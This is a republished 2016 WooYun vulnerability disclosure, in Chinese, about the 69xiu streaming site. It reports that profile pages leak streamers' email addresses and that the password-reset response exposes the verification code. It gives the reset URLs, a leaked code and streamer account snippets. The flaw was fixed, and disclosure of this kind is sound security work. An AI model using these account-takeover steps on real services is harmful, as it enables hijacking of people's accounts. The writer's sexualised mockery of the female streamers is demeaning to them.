69秀(玖秀)可上女主播的账号

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-06-06: 细节已通知厂商并且等待厂商处理中
2016-06-07: 厂商已经确认,细节仅向厂商公开
2016-06-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

在她直播的时候可以上了她 的 账号!

详细说明:

http://www.69xiu.com/rank

拿主站一个正在直播的女主播演示一下

1.jpg



进入直播页面

2.jpg



可以看到妹子正在卖力的直播中,个人页面存在信息泄露,可获取到主播的邮箱地址

3.jpg



email":"[email protected]

4.jpg



密码找回的功能也存在信息泄露,可利用邮箱重置密码(为了不影响厂商业务,犹豫了一下还是拿我自己的演示吧)

漏洞证明:

http://www.69xiu.com/my/checkemail/findpwd/

输入邮箱找回密码

5.jpg



6.jpg



可以看到只要知道code就能构造重置链接

response这里又泄露了

7.jpg



8.jpg



当然 女主播的也一样

9.jpg



is_findpwd_email=a:4:{s:8:"sendtime";i:1464837456;s:6:"verify";s:32:"9d591fd9e63ce54529f589c27c4e4357";s:5:"email";s:17:"[email protected]";s:6:"mobile";s:0:"";};

http://www.69xiu.com/my/checkemail/isfindpwd/?code=9d591fd9e63ce54529f589c27c4e4357

10.jpg



所以,在她直播的时候可以上了她 的 账号

就不进一步演示了。。。



还有好多女主播,列举几个

code 区域
MPT.Config("objRid", 71094697);
MPT.Config("objArtist", {"baseInfo":{"uid":"19971567","nickname":"\u51ef\u6492\u5927\u5e1d111","sex":"2","email":"[email protected]

MPT.Config("objRid", 71096441);
MPT.Config("objArtist", {"baseInfo":{"uid":"19972437","nickname":"AK\u4e36 \u7cd6\u679c","sex":"2","email":"[email protected]"

MPT.Config("objRid", 71074401);
MPT.Config("objArtist", {"baseInfo":{"uid":"19961505","nickname":"\u70ed\u821e\u8587\u513f\u65b0\u4eba\u6c42","sex":"2","email":"[email protected]"

 

修复方案:

email/code别返回

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-06-07 15:12

厂商回复:

漏洞已修复,高兴您对69秀的关注!

最新状态:

2016-06-07:漏洞已修复,非常感谢!


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:69秀(玖秀)可上女主播的账号 - https://www.15qq.cn/wooyun/349.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知